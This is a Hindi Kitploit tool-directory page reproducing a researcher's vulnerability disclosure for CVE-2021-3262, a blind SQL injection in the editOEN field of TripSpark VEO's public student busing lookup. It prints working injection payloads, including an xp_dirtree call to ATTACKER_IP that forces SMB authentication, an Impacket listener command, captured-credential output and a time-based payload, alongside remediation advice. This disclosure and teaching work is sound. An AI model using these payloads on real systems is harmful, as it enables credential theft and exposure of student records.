Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-3262 — CVE-2021-3262 - TripSpark VEO Transportation / NovusEDU के editOEN पैरामीटर में ब्लाइंड SQL इंजेक्शन। बिना प्रमाणीकरण के, इंटरनेट पर उपलब्ध। पेलोड, एनोटेटेड अनुरोध और साक्ष्य। | Kitploit
उपकरण/GitHubGitHub/l0lsec/cve-2021-3262
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubl0lsec/cve-2021-3262

CVE-2021-3262

CVE-2021-3262 - TripSpark VEO Transportation / NovusEDU के editOEN पैरामीटर में ब्लाइंड SQL इंजेक्शन। बिना प्रमाणीकरण के, इंटरनेट पर उपलब्ध। पेलोड, एनोटेटेड अनुरोध और साक्ष्य।

रिपॉजिटरी देखें
26 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2021-3262

TripSpark VEO Transportation / NovusEDU में SQL इंजेक्शन

TripSpark VEO Transportation के साथ शामिल सार्वजनिक "Student Busing Information" लुकअप पृष्ठ बिना प्रमाणीकरण के POST बॉडी इनपुट लेता है और उसे बिना पैरामीटराइज़ेशन या सर्वर-साइड सत्यापन के SQL सर्वर क्वेरी में जोड़ देता है। editOEN पैरामीटर (छात्र संख्या फ़ील्ड) इंजेक्टेबल है।

इंजेक्शन ब्लाइंड है: एप्लिकेशन कोई डेटाबेस त्रुटि या पढ़ने लायक कोई विभेदक सामग्री नहीं लौटाता। यह फिर भी आउट-ऑफ-बैंड पूरी तरह से शोषण योग्य है, क्योंकि डेटाबेस कनेक्शन master.dbo.xp_dirtree तक पहुँच सकता है, जो SQL सर्वर सेवा खाते को हमलावर द्वारा प्रदान किए गए UNC पथ पर SMB के माध्यम से आउटबाउंड प्रमाणीकरण करने के लिए बाध्य करता है।

बाहरी पैठ परीक्षण के दौरान पाया गया। मूल अभियान पर कैप्चर किया गया सेवा खाता क्रेडेंशियल वह प्रवेश बिंदु था जिसके कारण ग्राहक के Active Directory डोमेन और फ़ॉरेस्ट से पूरी तरह समझौता हुआ।

CVE-2021-3262 के रूप में प्रकाशित। Show Up Show Out Security के Sedric Louissaint द्वारा खोजा और रिपोर्ट किया गया।


सारांश

CVECVE-2021-3262
उत्पादTripSpark VEO Transportation / NovusEDU
प्रभावितNovusEDU-2.2.x-XP_BB-20201123-184084, VEO--20201123-184084OS
कमज़ोरीCWE-89: SQL इंजेक्शन
CVSS 3.1 (NVD)9.8 क्रिटिकल CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 2 (शोधकर्ता)9.0 AV:N/AC:L/Au:N/C:C/I:P/A:P
प्रकाशित2023-08-29
परीक्षण किया गयाWindows Server 2012 R2 Standard, SQL Server 2012 (SP3) 11.0.6020.0 (x64)
प्रमाणीकरण आवश्यककोई नहीं। लुकअप पृष्ठ डिज़ाइन से ही इंटरनेट-फेसिंग है।

NVD विवरण:

TripSpark VEO Transportation-2.2.x-XP_BB-20201123-184084 NovusEDU-2.2.x-XP_BB-20201123-184084 सर्वर-साइड लॉजिक का उपयोग करके सैनिटाइज़ किए बिना अंतिम उपयोगकर्ताओं से POST बॉडी पैरामीटर में असुरक्षित डेटा इनपुट की अनुमति देता है। "Student Busing Information" खोज क्वेरी में कस्टम SQL कमांड इंजेक्ट करना संभव था।

तकनीकी विवरण

उजागर सतह

जिले "Student Busing Information" पृष्ठ को अपनी सार्वजनिक वेबसाइट पर तैनात करते हैं ताकि माता-पिता किसी छात्र के बस असाइनमेंट को देख सकें। यह पृष्ठ छात्र का N नंबर और जन्मतिथि माँगता है, और यह जानबूझकर बिना प्रमाणीकरण के है।

सार्वजनिक Student Busing Information पृष्ठ

N नंबर फ़ील्ड editOEN के रूप में पोस्ट होता है। जन्मतिथि cboxMonth, cboxDay और cboxYear के रूप में पोस्ट होती है। editOEN इंजेक्टेबल पैरामीटर है।

ब्लाइंड इंजेक्शन

इस युग के कई ASP.NET अनुप्रयोगों के विपरीत, यह पृष्ठ डेटाबेस त्रुटियों को प्रतिध्वनित नहीं करता। एक सुव्यवस्थित क्वेरी और एक टूटी हुई क्वेरी के बीच कोई दृश्य अंतर नहीं है, इसलिए इन-बैंड तकनीकें एक मृत अंत हैं।

स्टैक्ड क्वेरी निष्पादित होती हैं, जो कि आवश्यक है।

xp_dirtree के माध्यम से आउट-ऑफ-बैंड शोषण

master.dbo.xp_dirtree एक निर्देशिका की गणना करता है। UNC पथ दिए जाने पर, SQL सर्वर इसे पढ़ने से पहले SMB पर लक्ष्य होस्ट से प्रमाणीकरण करता है। इसे एक लिसनर की ओर इंगित करने से एक मूक इंजेक्शन दृश्यमान हो जाता है:

root@kitploit:~
123';declare @q varchar(99);set @q='\\ATTACKER_IP'+'\fro'; exec master.dbo.xp_dirtree @q;--

editOEN पैरामीटर में पेलोड

अनुरोध एक सामान्य ASP.NET WebForms POST है, लगभग 4,700 बाइट्स, जिसमें से अधिकांश __VIEWSTATE है। पूरा अनुरोध poc/exploited-request.http में, पेलोड poc/payloads.sql में।

शोषित HTTP अनुरोध

कैप्चर किया गया प्रमाणीकरण

Impacket के smbserver.py के साथ सार्वजनिक इंटरनेट पर एक होस्ट पर लिसनिंग करते हुए, जिले के नेटवर्क के अंदर डेटाबेस सर्वर आउटबाउंड प्रमाणीकरण करता है:

root@kitploit:~
[*] Incoming connection (204.x.x.x,58497)
[*] AUTHENTICATE_MESSAGE (\SQLServices,<REDACTED>-VEO-DB)
[*] User <REDACTED>-VEO-DB\SQLServices authenticated successfully
[*] SQLServices::...

Impacket के साथ कैप्चर किया गया बलात प्रमाणीकरण

दो चीज़ों का स्पष्ट रूप से उल्लेख करना उचित है। पहला, यह एक बिना प्रमाणीकरण वाला इंटरनेट-फेसिंग फ़ॉर्म है जो उत्पादन डेटाबेस तक पहुँच रहा है। दूसरा, उस डेटाबेस सर्वर को मनमाने इंटरनेट होस्ट से आउटबाउंड SMB कनेक्शन स्थापित करने की अनुमति थी, जिसने ब्लाइंड इंजेक्शन को अवलोकन योग्य बनाया।

प्रभाव

इंजेक्शन के अलावा, SQL सर्वर सेवा खाते के लिए कैप्चर किया गया NTLMv2 क्रेडेंशियल मूल अभियान पर प्रारंभिक प्रवेश बिंदु था। वहाँ से मूल्यांकन ग्राहक के Active Directory डोमेन और फ़ॉरेस्ट से पूर्ण समझौते तक बढ़ गया।

जोखिम में डेटा छात्र परिवहन रिकॉर्ड है: नाम, घर के पते, निर्धारित बस, निर्धारित स्टॉप, पिकअप समय, और विशेष शिक्षा रूटिंग। यह एक अनुसूची है कि पहचान योग्य बच्चे ज्ञात समय पर शारीरिक रूप से कहाँ होंगे।

पुनरुत्पादन

एक प्रयोगशाला उदाहरण के विरुद्ध जिसके स्वामी आप हैं या जिसे परीक्षण करने के लिए आप अधिकृत हैं:

  1. "Student Busing Information" पृष्ठ लोड करें।
  2. एक होस्ट पर लिसनर शुरू करें जिस तक लक्ष्य पहुँच सकता है:
    root@kitploit:~
    sudo smbserver.py c . -smb2support
    
  3. फ़ॉर्म को N नंबर फ़ील्ड में poc/payloads.sql से xp_dirtree पेलोड के साथ सबमिट करें, अपना स्वयं का IP प्रतिस्थापित करें। यदि फ़ील्ड में क्लाइंट-साइड लंबाई सीमा है तो ब्राउज़र में टाइप करने के बजाय POST को कैप्चर और रीप्ले करें, क्योंकि वह सीमा सर्वर साइड पर मौजूद नहीं है।
  4. एक कमज़ोर बिल्ड SQL सर्वर सेवा खाते से इनबाउंड SMB प्रमाणीकरण उत्पन्न करता है। HTTP प्रतिक्रिया में कुछ भी नहीं बदलता।
  5. यदि आप इनबाउंड SMB प्राप्त नहीं कर सकते तो समय-आधारित पुष्टि भी काम करती है:
    root@kitploit:~
    123'; waitfor delay '0:0:10';--
    

रिपॉज़िटरी सामग्री

root@kitploit:~
poc/
  payloads.sql            Detection, time-based and out-of-band payloads for editOEN
  exploited-request.http  The full POST request, ready for sqlmap -r
  sqlmap.md               sqlmap invocations for a blind stacked-query injection
media/
  01-student-busing-information-page.png
  02-editoen-payload-in-burp.png
  03-forced-auth-captured-impacket.png
  04-exploited-http-request.png

कैप्चर में क्लाइंट पहचानकर्ता रिडैक्ट किए गए हैं। लिसनर पते मूल अभियान के हैं और बहुत पहले मृत हो चुके हैं। पुनरुत्पादन करते समय अपने स्वयं के पते प्रतिस्थापित करें।

निवारण

  1. पैरामीटराइज़्ड क्वेरी। editOEN को एक पैरामीटर के रूप में बाँधें और पेलोड उसमें जो कुछ भी हो, एक निष्क्रिय स्ट्रिंग बन जाएगा।
  2. सर्वर-साइड सत्यापन। एक छात्र संख्या छोटी और संख्यात्मक होती है। इसे फ़ॉर्म में नहीं, सर्वर पर लागू करें।
  3. डेटाबेस खाते के लिए न्यूनतम विशेषाधिकार। एक सार्वजनिक लुकअप पृष्ठ के पीछे के खाते को केवल बस असाइनमेंट पढ़ने की आवश्यकता है और कुछ नहीं। xp_dirtree और अन्य विस्तारित संग्रहीत प्रक्रियाओं तक पहुँच रद्द करें।
  4. ईग्रेस फ़िल्टरिंग। एक स्कूल जिले के डेटाबेस सर्वर के पास इंटरनेट से SMB कनेक्शन खोलने का कोई कारण नहीं है। आउटबाउंड 445 को अवरुद्ध करने से आउट-ऑफ-बैंड चैनल समाप्त हो जाता है।
  5. सार्वजनिक फ़ॉर्म को रिकॉर्ड प्रणाली से अलग करें। माता-पिता जिस पृष्ठ का उपयोग करते हैं उसे उत्पादन डेटाबेस के बजाय एक प्रतिबंधित प्रतिकृति से क्वेरी करनी चाहिए जिसमें विशेष शिक्षा रूटिंग भी हो।

समयरेखा

दिनांकघटना
2021बाहरी पैठ परीक्षण के दौरान पाया गया और TripSpark को रिपोर्ट किया गया
2023-08-29CVE-2021-3262 NVD पर प्रकाशित, 9.8 क्रिटिकल स्कोर

राइट-अप

  • व्यक्तिगत लेखा: https://sedriclouissaint.com/blog/tripspark-veo-sql-injection-cve-2021-3262/
  • Show Up Show Out Security: https://susos.co/blog/sqlspark-sql-injection-in-tripspark-veo-transport-cve-2021-3262

अस्वीकरण

प्रकटीकरण के बाद, रक्षात्मक और शैक्षिक उपयोग के लिए प्रकाशित। इन पेलोड को उन प्रणालियों के विरुद्ध न चलाएँ जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित प्राधिकरण नहीं है। यदि आप एक जिला तैनाती का प्रशासन करते हैं, तो यहाँ उपयोगी कार्रवाई यह है कि आप अपने विक्रेता से लिखित रूप में पूछें कि क्या आपके सार्वजनिक फ़ॉर्म के पीछे की क्वेरी पैरामीटराइज़्ड हैं।

टूल डाउनलोड करें